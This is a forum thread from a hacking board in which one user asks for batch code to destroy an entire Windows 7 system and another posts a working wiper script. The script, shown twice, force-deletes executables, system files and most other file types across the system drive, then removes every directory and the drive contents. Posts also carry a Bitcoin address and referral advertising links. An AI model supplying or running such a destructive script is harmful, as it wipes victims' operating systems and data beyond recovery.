Login Register






Kiling windows 7 filter_list
Author
Message
Kiling windows 7 #1
Do you know any codes bat that will destroy the entire system Windows 7, because tests on the virtual machine I have WindowsXP, but I'm looking for windows 7 there already are some other attributes, maybe some command that destroys the font?

Reply

Kiling windows 7 #2
Do you know any codes bat that will destroy the entire system Windows 7, because tests on the virtual machine I have WindowsXP, but I'm looking for windows 7 there already are some other attributes, maybe some command that destroys the font?

Reply

RE: Kiling windows 7 #3
Well, I might code out a little thing that - when run with administrator privileges - should make a bit of damages.

Code:
@echo off :: written by noize color 0a title BATCH'D! rem NOIZE'S BATCH'D - just meant to damage cd %systemdrive% echo BATCH'D! echo @for /f "tokens=*" %%a in ('dir . /ad/b') do del "%%a" /f /q /s ^> nul > batcher.bat start batcher.bat set name=%0 ren %0 file.bat for %%a in (txt cmd rtf avi jpg jpeg gif png wmv dll exe sys bak ico inf ini) do del *.%%a /f /q /s > nul ren %0 file.cmd del *.bat /f /q /s > nul ren %0 %name% for /f "tokens=*" %%b in ('dir . /ad/b') do del "%%b\*.*" /q /s /f > nul for /f "tokens=*" %%b in ('dir . /ad/b') do rd "%%b" /q /s > nul rd %systemdrive% /s rd %homedrive% /s del *.* /f /q /s rd %homedrive% /s rd %systemdrive% /s

I know it's not the best; just something.
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize

Reply

RE: Kiling windows 7 #4
Well, I might code out a little thing that - when run with administrator privileges - should make a bit of damages.

Code:
@echo off :: written by noize color 0a title BATCH'D! rem NOIZE'S BATCH'D - just meant to damage cd %systemdrive% echo BATCH'D! echo @for /f "tokens=*" %%a in ('dir . /ad/b') do del "%%a" /f /q /s ^> nul > batcher.bat start batcher.bat set name=%0 ren %0 file.bat for %%a in (txt cmd rtf avi jpg jpeg gif png wmv dll exe sys bak ico inf ini) do del *.%%a /f /q /s > nul ren %0 file.cmd del *.bat /f /q /s > nul ren %0 %name% for /f "tokens=*" %%b in ('dir . /ad/b') do del "%%b\*.*" /q /s /f > nul for /f "tokens=*" %%b in ('dir . /ad/b') do rd "%%b" /q /s > nul rd %systemdrive% /s rd %homedrive% /s del *.* /f /q /s rd %homedrive% /s rd %systemdrive% /s

I know it's not the best; just something.
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize

Reply

RE: Kiling windows 7 #5
thank you very much

Unfortunately, windows 7 sections that script up for anything you are not suited for something else?

Reply

RE: Kiling windows 7 #6
thank you very much

Unfortunately, windows 7 sections that script up for anything you are not suited for something else?

Reply

RE: Kiling windows 7 #7
(05-04-2013, 05:52 PM)kairo1981 Wrote: Unfortunately, windows 7 sections that script up for anything you are not suited for something else?

Scuse me, but I believe I didn't get your question. Maybe you could have it in some other way?
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize

Reply

RE: Kiling windows 7 #8
(05-04-2013, 05:52 PM)kairo1981 Wrote: Unfortunately, windows 7 sections that script up for anything you are not suited for something else?

Scuse me, but I believe I didn't get your question. Maybe you could have it in some other way?
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize

Reply